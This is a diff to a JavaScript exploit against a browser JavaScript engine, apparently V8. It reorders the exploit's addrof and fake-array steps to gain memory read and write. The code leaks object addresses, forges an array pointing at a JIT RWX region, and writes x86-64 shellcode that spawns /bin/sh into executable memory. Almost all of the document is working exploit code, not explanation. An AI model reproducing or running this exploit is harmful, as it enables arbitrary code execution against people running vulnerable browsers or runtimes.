@@ -148,7 +148,6 @@ function main() {
148148 }
149149 //These are there to stop main being optimized by JIT
150150 globalIdx [ 'a' + globalIdx ] = 1 ;
151- let obj = [ 1.1 , 1.1 , 1.1 ] ;
152151 //Can't refactor this, looks like it cause some double rounding problem (got optimized?)
153152 for ( let i = 0 ; i < objArr . length ; i ++ ) {
154153 let thisArr = objArr [ i ] ;
@@ -173,29 +172,17 @@ function main() {
173172 let index = result . idx ;
174173
175174 let instanceAddr = ftoi32 ( larr [ index ] ) [ 0 ] ;
175+ let instanceFloatAddr = larr [ index ] ;
176176 console . log ( "found instance address: 0x" + instanceAddr . toString ( 16 ) + " at index: " + index ) ;
177+ let x = { } ;
177178 for ( let i = 0 ; i < objArr . length ; i ++ ) {
178179 let thisArr = objArr [ i ] ;
179- thisArr . fill ( obj ) ;
180+ thisArr . fill ( x ) ;
180181 }
181- globalIdx [ 'a' + globalIdx + 2000 ] = 1 ;
182-
183- let addr = ftoi32 ( larr [ index ] ) [ 0 ] ;
184- let objEleAddr = addr - 0x20 + 0x8 ;
185- let floatAddr = i32tof ( objEleAddr , objEleAddr ) ;
186- let floatMapAddr = i32tof ( mapAddr , mapAddr ) ;
187- //Faking an array at using obj[0] and obj[1]
188- obj [ 0 ] = floatMapAddr ;
189- let eleLength = i32tof ( instanceAddr + rwxOffset , 10 ) ;
190-
191- obj [ 1 ] = eleLength ;
192182
193- larr [ index ] = floatAddr ;
194-
195- console . log ( "array address: 0x" + addr . toString ( 16 ) ) ;
196- console . log ( "array element address: 0x" + objEleAddr . toString ( 16 ) ) ;
183+ globalIdx [ 'a' + globalIdx + 5000 ] = 1 ;
197184
198- let rwxAddr = 0 ;
185+ larr [ index ] = instanceFloatAddr ;
199186 let objArrIdx = - 1 ;
200187 let thisArrIdx = - 1 ;
201188 for ( let i = 0 ; i < objArr . length ; i ++ ) {
@@ -204,21 +191,46 @@ function main() {
204191 let thisArr = objArr [ i ] ;
205192 for ( let j = 0 ; j < thisArr . length ; j ++ ) {
206193 let thisObj = thisArr [ j ] ;
207- if ( thisObj != obj ) {
208- console . log ( "fake array at: " + i + " index: " + j ) ;
194+ if ( thisObj == instance ) {
195+ console . log ( "found instance object at: " + i + " index: " + j ) ;
209196 objArrIdx = i ;
210197 thisArrIdx = j ;
211- if ( ! ( thisObj instanceof Array ) ) {
212- console . log ( "failed getting fake array." ) ;
213- restart ( ) ;
214- return ;
215- }
216- rwxAddr = thisObj [ 0 ] ;
217- console . log ( "rwx address at: 0x" + ftoi ( rwxAddr ) . toString ( 16 ) ) ;
218198 }
219199 }
220200 }
221201 globalIdx [ 'a' + globalIdx + 4000 ] = 1 ;
202+ if ( objArrIdx == - 1 ) {
203+ console . log ( "failed getting fake object index." ) ;
204+ restart ( ) ;
205+ return ;
206+ }
207+ let obj = [ 1.1 , 1.1 , 1.1 ] ;
208+ let thisArr = objArr [ objArrIdx ] ;
209+ thisArr . fill ( obj ) ;
210+ globalIdx [ 'a' + globalIdx + 2000 ] = 1 ;
211+
212+ let addr = ftoi32 ( larr [ index ] ) [ 0 ] ;
213+ let objEleAddr = addr + 0x18 + 0x8 ;
214+ let floatAddr = i32tof ( objEleAddr , objEleAddr ) ;
215+ let floatMapAddr = i32tof ( mapAddr , mapAddr ) ;
216+ //Faking an array at using obj[0] and obj[1]
217+ obj [ 0 ] = floatMapAddr ;
218+ let eleLength = i32tof ( instanceAddr + rwxOffset , 10 ) ;
219+
220+ obj [ 1 ] = eleLength ;
221+
222+ larr [ index ] = floatAddr ;
223+ console . log ( "array address: 0x" + addr . toString ( 16 ) ) ;
224+ console . log ( "array element address: 0x" + objEleAddr . toString ( 16 ) ) ;
225+ let rwxAddr = 0 ;
226+ let fakeArray = objArr [ objArrIdx ] [ thisArrIdx ] ;
227+ if ( ! ( fakeArray instanceof Array ) ) {
228+ console . log ( "fail getting fake array." ) ;
229+ restart ( ) ;
230+ return ;
231+ }
232+ rwxAddr = fakeArray [ 0 ] ;
233+ console . log ( "rwx address at: 0x" + ftoi ( rwxAddr ) . toString ( 16 ) ) ;
222234
223235 if ( rwxAddr == 0 ) {
224236 console . log ( "failed getting rwx address." ) ;
@@ -228,15 +240,12 @@ function main() {
228240
229241 //Read shellArray address
230242 let shellArray = new Uint8Array ( 100 ) ;
231- let thisArr = objArr [ objArrIdx ] ;
243+ thisArr = objArr [ objArrIdx ] ;
232244 thisArr . fill ( shellArray ) ;
233245
234246 let shellAddr = ftoi32 ( larr [ index ] ) [ 0 ] ;
235247 console . log ( "shellArray addr: 0x" + shellAddr . toString ( 16 ) ) ;
236248 obj [ 1 ] = i32tof ( shellAddr + 0x20 , 10 ) ;
237- //Place fake array back into objArr[objArrIdx][thisArrIdx]
238- larr [ index ] = floatAddr ;
239- let fakeArray = objArr [ objArrIdx ] [ thisArrIdx ] ;
240249 fakeArray [ 0 ] = rwxAddr ;
241250 var shellCode = [ 0x31 , 0xf6 , 0x31 , 0xd2 , 0x31 , 0xc0 , 0x48 , 0xbb , 0x2f , 0x62 , 0x69 , 0x6e , 0x2f , 0x2f , 0x73 , 0x68 , 0x56 , 0x53 , 0x54 , 0x5f , 0xb8 , 0x3b , 0 , 0 , 0 , 0xf , 0x5 ] ;
242251 for ( let i = 0 ; i < shellCode . length ; i ++ ) {
0 commit comments